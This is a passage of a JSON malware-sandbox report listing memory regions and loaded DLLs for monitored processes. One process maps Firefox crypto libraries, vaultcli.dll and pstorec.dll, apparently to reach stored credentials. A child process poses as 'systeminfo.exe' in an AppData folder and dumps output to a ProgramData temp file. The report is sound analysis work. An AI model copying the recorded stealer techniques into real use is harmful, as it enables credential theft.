"00:01:08.953", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2686976, "type": "region", "version": 1 }, "end_va": 3735551, "entry_point": 0, "filename": null, "id": "region_1927", "name": "private_0x0000000000290000", "norm_filename": null, "region_type": "private_memory", "start_va": 2686976, "timestamp": "00:01:08.970", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1183743, "entry_point": 0, "filename": null, "id": "region_1928", "name": "pagefile_0x0000000000120000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1179648, "timestamp": "00:01:08.977", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 33554432, "type": "region", "version": 1 }, "end_va": 36499455, "entry_point": 33554432, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1930", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 33554432, "timestamp": "00:01:08.983", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1958150144, "type": "region", "version": 1 }, "end_va": 1958240255, "entry_point": 1958161859, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_1941", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1958150144, "timestamp": "00:01:09.195", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 245760, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1556479, "entry_point": 1315469, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_1942", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1310720, "timestamp": "00:01:09.201", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1957888000, "type": "region", "version": 1 }, "end_va": 1958129663, "entry_point": 1957892749, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_1947", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1957888000, "timestamp": "00:01:09.211", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 10158080, "type": "region", "version": 1 }, "end_va": 10420223, "entry_point": 0, "filename": null, "id": "region_1948", "name": "private_0x00000000009b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 10158080, "timestamp": "00:01:09.219", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 10551296, "type": "region", "version": 1 }, "end_va": 11599871, "entry_point": 0, "filename": null, "id": "region_1949", "name": "private_0x0000000000a10000", "norm_filename": null, "region_type": "private_memory", "start_va": 10551296, "timestamp": "00:01:09.219", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_1950", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:09.219", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1947533312, "type": "region", "version": 1 }, "end_va": 1947586559, "entry_point": 1947556637, "filename": "\\Windows\\SysWOW64\\pstorec.dll", "id": "region_1951", "name": "pstorec.dll", "norm_filename": "c:\\windows\\syswow64\\pstorec.dll", "region_type": "memory_mapped_file", "start_va": 1947533312, "timestamp": "00:01:09.219", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 1947402240, "type": "region", "version": 1 }, "end_va": 1947484159, "entry_point": 1947409833, "filename": "\\Windows\\SysWOW64\\atl.dll", "id": "region_1952", "name": "atl.dll", "norm_filename": "c:\\windows\\syswow64\\atl.dll", "region_type": "memory_mapped_file", "start_va": 1947402240, "timestamp": "00:01:09.220", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1947074560, "type": "region", "version": 1 }, "end_va": 1947123711, "entry_point": 1947074560, "filename": "\\Windows\\SysWOW64\\vaultcli.dll", "id": "region_1953", "name": "vaultcli.dll", "norm_filename": "c:\\windows\\syswow64\\vaultcli.dll", "region_type": "memory_mapped_file", "start_va": 1947074560, "timestamp": "00:01:09.226", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1052672, "start_va": 36503552, "type": "region", "version": 1 }, "end_va": 37556223, "entry_point": 0, "filename": null, "id": "region_2023", "name": "private_0x00000000022d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 36503552, "timestamp": "00:01:09.810", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1777664, "start_va": 36503552, "type": "region", "version": 1 }, "end_va": 38281215, "entry_point": 36503552, "filename": "\\Program Files (x86)\\Mozilla Firefox\\nss3.dll", "id": "region_2027", "name": "nss3.dll", "norm_filename": "c:\\program files (x86)\\mozilla firefox\\nss3.dll", "region_type": "memory_mapped_file", "start_va": 36503552, "timestamp": "00:01:09.814", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1777664, "start_va": 36503552, "type": "region", "version": 1 }, "end_va": 38281215, "entry_point": 37955619, "filename": "\\Program Files (x86)\\Mozilla Firefox\\nss3.dll", "id": "region_2028", "name": "nss3.dll", "norm_filename": "c:\\program files (x86)\\mozilla firefox\\nss3.dll", "region_type": "memory_mapped_file", "start_va": 36503552, "timestamp": "00:01:09.845", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1789952, "start_va": 1944780800, "type": "region", "version": 1 }, "end_va": 1946570751, "entry_point": 1946232867, "filename": "\\Program Files (x86)\\Mozilla Firefox\\nss3.dll", "id": "region_2029", "name": "nss3.dll", "norm_filename": "c:\\program files (x86)\\mozilla firefox\\nss3.dll", "region_type": "memory_mapped_file", "start_va": 1944780800, "timestamp": "00:01:09.855", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 204800, "start_va": 1954938880, "type": "region", "version": 1 }, "end_va": 1955143679, "entry_point": 1954953201, "filename": "\\Windows\\SysWOW64\\winmm.dll", "id": "region_2030", "name": "winmm.dll", "norm_filename": "c:\\windows\\syswow64\\winmm.dll", "region_type": "memory_mapped_file", "start_va": 1954938880, "timestamp": "00:01:09.857", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1944715264, "type": "region", "version": 1 }, "end_va": 1944743935, "entry_point": 1944715264, "filename": "\\Windows\\SysWOW64\\wsock32.dll", "id": "region_2031", "name": "wsock32.dll", "norm_filename": "c:\\windows\\syswow64\\wsock32.dll", "region_type": "memory_mapped_file", "start_va": 1944715264, "timestamp": "00:01:09.859", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1971912704, "type": "region", "version": 1 }, "end_va": 1972129791, "entry_point": 1971917917, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_2032", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1971912704, "timestamp": "00:01:09.877", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1998848000, "type": "region", "version": 1 }, "end_va": 1998872575, "entry_point": 1998854018, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_2033", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1998848000, "timestamp": "00:01:09.878", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 778240, "start_va": 1943928832, "type": "region", "version": 1 }, "end_va": 1944707071, "entry_point": 1943928832, "filename": "\\Program Files (x86)\\Mozilla Firefox\\msvcr100.dll", "id": "region_2034", "name": "msvcr100.dll", "norm_filename": "c:\\program files (x86)\\mozilla firefox\\msvcr100.dll", "region_type": "memory_mapped_file", "start_va": 1943928832, "timestamp": "00:01:09.884", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 139264, "start_va": 1943732224, "type": "region", "version": 1 }, "end_va": 1943871487, "entry_point": 1943732224, "filename": "\\Program Files (x86)\\Mozilla Firefox\\mozglue.dll", "id": "region_2035", "name": "mozglue.dll", "norm_filename": "c:\\program files (x86)\\mozilla firefox\\mozglue.dll", "region_type": "memory_mapped_file", "start_va": 1943732224, "timestamp": "00:01:09.942", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 430080, "start_va": 1943273472, "type": "region", "version": 1 }, "end_va": 1943703551, "entry_point": 1943273472, "filename": "\\Program Files (x86)\\Mozilla Firefox\\msvcp100.dll", "id": "region_2036", "name": "msvcp100.dll", "norm_filename": "c:\\program files (x86)\\mozilla firefox\\msvcp100.dll", "region_type": "memory_mapped_file", "start_va": 1943273472, "timestamp": "00:01:09.965", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1310720, "start_va": 36503552, "type": "region", "version": 1 }, "end_va": 37814271, "entry_point": 0, "filename": null, "id": "region_2037", "name": "private_0x00000000022d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 36503552, "timestamp": "00:01:10.013", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1114112, "start_va": 37814272, "type": "region", "version": 1 }, "end_va": 38928383, "entry_point": 0, "filename": null, "id": "region_2038", "name": "private_0x0000000002410000", "norm_filename": null, "region_type": "private_memory", "start_va": 37814272, "timestamp": "00:01:10.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 36503552, "type": "region", "version": 1 }, "end_va": 37552127, "entry_point": 0, "filename": null, "id": "region_2039", "name": "private_0x00000000022d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 36503552, "timestamp": "00:01:10.030", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 37552128, "type": "region", "version": 1 }, "end_va": 37814271, "entry_point": 0, "filename": null, "id": "region_2040", "name": "private_0x00000000023d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37552128, "timestamp": "00:01:10.030", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 37814272, "type": "region", "version": 1 }, "end_va": 38862847, "entry_point": 0, "filename": null, "id": "region_2041", "name": "private_0x0000000002410000", "norm_filename": null, "region_type": "private_memory", "start_va": 37814272, "timestamp": "00:01:10.315", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 38862848, "type": "region", "version": 1 }, "end_va": 38928383, "entry_point": 0, "filename": null, "id": "region_2042", "name": "private_0x0000000002510000", "norm_filename": null, "region_type": "private_memory", "start_va": 38862848, "timestamp": "00:01:10.315", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 2097152, "start_va": 38928384, "type": "region", "version": 1 }, "end_va": 41025535, "entry_point": 0, "filename": null, "id": "region_2043", "name": "private_0x0000000002520000", "norm_filename": null, "region_type": "private_memory", "start_va": 38928384, "timestamp": "00:01:10.316", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 39845888, "type": "region", "version": 1 }, "end_va": 40894463, "entry_point": 0, "filename": null, "id": "region_2044", "name": "private_0x0000000002600000", "norm_filename": null, "region_type": "private_memory", "start_va": 39845888, "timestamp": "00:01:10.316", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 159744, "start_va": 1943076864, "type": "region", "version": 1 }, "end_va": 1943236607, "entry_point": 1943076864, "filename": "\\Program Files (x86)\\Mozilla Firefox\\softokn3.dll", "id": "region_2045", "name": "softokn3.dll", "norm_filename": "c:\\program files (x86)\\mozilla firefox\\softokn3.dll", "region_type": "memory_mapped_file", "start_va": 1943076864, "timestamp": "00:01:10.343", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 1942945792, "type": "region", "version": 1 }, "end_va": 1943039999, "entry_point": 1942945792, "filename": "\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.dll", "id": "region_2046", "name": "nssdbm3.dll", "norm_filename": "c:\\program files (x86)\\mozilla firefox\\nssdbm3.dll", "region_type": "memory_mapped_file", "start_va": 1942945792, "timestamp": "00:01:10.363", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1314815, "entry_point": 1310720, "filename": "\\Windows\\SysWOW64\\tzres.dll", "id": "region_2047", "name": "tzres.dll", "norm_filename": "c:\\windows\\syswow64\\tzres.dll", "region_type": "memory_mapped_file", "start_va": 1310720, "timestamp": "00:01:10.379", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1404927, "entry_point": 0, "filename": null, "id": "region_2048", "name": "pagefile_0x0000000000150000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1376256, "timestamp": "00:01:10.385", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1449983, "entry_point": 0, "filename": null, "id": "region_2049", "name": "pagefile_0x0000000000160000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1441792, "timestamp": "00:01:10.385", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 40894464, "type": "region", "version": 1 }, "end_va": 45035519, "entry_point": 0, "filename": null, "id": "region_2050", "name": "pagefile_0x0000000002700000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 40894464, "timestamp": "00:01:10.385", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 323584, "start_va": 1942618112, "type": "region", "version": 1 }, "end_va": 1942941695, "entry_point": 1942618112, "filename": "\\Program Files (x86)\\Mozilla Firefox\\freebl3.dll", "id": "region_2052", "name": "freebl3.dll", "norm_filename": "c:\\program files (x86)\\mozilla firefox\\freebl3.dll", "region_type": "memory_mapped_file", "start_va": 1942618112, "timestamp": "00:01:10.408", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 159744, "start_va": 1942880256, "type": "region", "version": 1 }, "end_va": 1943039999, "entry_point": 1942996361, "filename": "\\Program Files (x86)\\Mozilla Firefox\\softokn3.dll", "id": "region_2053", "name": "softokn3.dll", "norm_filename": "c:\\program files (x86)\\mozilla firefox\\softokn3.dll", "region_type": "memory_mapped_file", "start_va": 1942880256, "timestamp": "00:01:10.501", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 1943142400, "type": "region", "version": 1 }, "end_va": 1943236607, "entry_point": 1943214752, "filename": "\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.dll", "id": "region_2054", "name": "nssdbm3.dll", "norm_filename": "c:\\program files (x86)\\mozilla firefox\\nssdbm3.dll", "region_type": "memory_mapped_file", "start_va": 1943142400, "timestamp": "00:01:10.503", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 323584, "start_va": 1942552576, "type": "region", "version": 1 }, "end_va": 1942876159, "entry_point": 1942774786, "filename": "\\Program Files (x86)\\Mozilla Firefox\\freebl3.dll", "id": "region_2055", "name": "freebl3.dll", "norm_filename": "c:\\program files (x86)\\mozilla firefox\\freebl3.dll", "region_type": "memory_mapped_file", "start_va": 1942552576, "timestamp": "00:01:10.525", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1376255, "entry_point": 0, "filename": null, "id": "region_2056", "name": "private_0x0000000000140000", "norm_filename": null, "region_type": "private_memory", "start_va": 1310720, "timestamp": "00:01:10.529", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 36864, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1544191, "entry_point": 0, "filename": null, "id": "region_2057", "name": "pagefile_0x0000000000170000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1507328, "timestamp": "00:01:10.530", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1961558016, "type": "region", "version": 1 }, "end_va": 1961578495, "entry_point": 1961558016, "filename": "\\Windows\\SysWOW64\\psapi.dll", "id": "region_2058", "name": "psapi.dll", "norm_filename": "c:\\windows\\syswow64\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 1961558016, "timestamp": "00:01:10.536", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 36864, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1347583, "entry_point": 0, "filename": null, "id": "region_2059", "name": "pagefile_0x0000000000140000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1310720, "timestamp": "00:01:10.545", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\systeminfo.exe\" /scomma \"C:\\ProgramData\\FB2F.tmp\"", "filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\systeminfo.exe", "id": "proc_11", "image_name": "systeminfo.exe", "monitor_reason": "child_process", "monitored_id": 11, "origin_monitor_id": 7, "ref_parent_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1856", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:08.730", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_1857", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:08.730", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1858", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:08.730", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_1859", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:08.732", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 401407, "entry_point": 0, "filename": null, "id": "region_1860", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:08.732", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1507327, "entry_point": 0, "filename": null, "id": "region_1861", "name": "private_0x0000000000130000", "norm_filename": null, "region_type": "private_memory", "start_va": 1245184, "timestamp": "00:01:08.732", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 3211263, "entry_point": 0, "filename": null, "id": "region_1862", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:01:08.732", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 12451840, "type": "region", "version": 1 }, "end_va": 12578815, "entry_point": 12458144, "filename": "\\Users\\Public\\3292.exe", "id": "region_1863", "name": "3292.exe", "norm_filename": "c:\\users\\public\\3292.exe", "region_type": "memory_mapped_file", "start_va": 12451840, "timestamp": "00:01:08.732", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 1997078528, "type": "region", "version": 1 }, "end_va": 1998819327, "entry_point": 1997078528, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1864", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1997078528, "timestamp": "00:01:08.733", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 1999044608, "type": "region", "version": 1 }, "end_va": 2000617471, "entry_point": 1999044608, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_1865", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999044608, "timestamp": "00:01:08.733", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_1866", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:08.734", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_1867", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:08.734", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_1868", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:08.734", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_1869", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:08.734", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses 